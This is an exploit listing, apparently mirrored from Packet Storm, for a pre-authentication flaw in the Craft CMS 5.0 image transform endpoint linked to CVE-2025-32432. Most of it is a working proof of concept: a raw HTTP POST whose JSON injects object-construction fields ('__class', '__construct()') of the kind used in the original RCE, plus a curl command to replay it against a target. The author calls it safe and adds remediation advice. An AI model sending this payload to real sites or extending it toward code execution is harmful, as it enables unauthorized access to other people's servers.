Share
## https://sploitus.com/exploit?id=PACKETSTORM:212538
=============================================================================================================================================
    | # Title     : Craft CMS 5.0 Image Transform Authentication Logic Flaw                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com                                                                                                        |
    =============================================================================================================================================
    
    POC : 
    
    [+] Description
    
        A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
        to trigger backend processing without prior authentication. 
    	While the original Metasploit module targeted RCE, (https://packetstorm.news/files/id/190728/  	CVE-2025-32432) 
    	
    
    This PoC does *not* execute code, does *not* write files, and does *not* inject
    payloads. It only proves that the endpoint performs internal logic operations
    without authentication.
    
    # Vulnerability Class
    Authentication Bypass β†’ Pre‑Auth Backend Processing
    
    # Impact
    An attacker can:
    - Trigger image transformation logic without logging in.
    - Interact with backend components not intended for anonymous users.
    - Validate the presence of the vulnerability safely without RCE.
    
    =====================================================================
    POC :
    =====================================================================
    
    Request :
    ---------
    POST /index.php?p=actions/assets/generate-transform HTTP/1.1
    Host: TARGET
    Content-Type: application/json
    
    {
      "assetId": 1,
      "handle": {
        "width": 100,
        "height": 100,
        "as test": {
          "class": "craft\\\\behaviors\\\\FieldLayoutBehavior",
          "__class": "yii\\\\rbac\\\\PhpManager",
          "__construct()": [
            { "itemFile": "/dev/null" }
          ]
        }
      }
    }
    
    Effect :
    --------
    - The server processes the transform request.
    - The endpoint responds with a JSON transformation result.
    - This demonstrates the pre-auth processing weakness.
    - No execution, no payload, no harmful operations.
    
    =====================================================================
    How to Save & Use the PoC :
    =====================================================================
    
    1. Save the request into a file named:
       craftcms_pre_auth_poc.txt
    
    2. Use curl to replay the PoC (legal environments only):
       curl -X POST \
         -H "Content-Type: application/json" \
         -d @craftcms_pre_auth_poc.txt \
         https://TARGET/index.php?p=actions/assets/generate-transform
    
    3. Expected safe behavior:
       The server processes the request and responds with JSON even though
       the attacker is not authenticated.
    
    4. Tools that can import the PoC:
       - Burp Suite Repeater
       - OWASP ZAP
       - Postman Raw HTTP
    
    =====================================================================
    # Recommendation
    - Require authentication on all asset transformation endpoints.
    - Validate input types before passing them to backend behavior handlers.
    - Apply the vendor patch immediately once available.
    
    =====================================================================
    # Disclosure Timeline
    - Original discovery: Orange Cyberdefense CSIRT
    - Educational safe PoC adaptation: indoushka
    - Status: Safe demonstration (no execution)
    =====================================================================
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================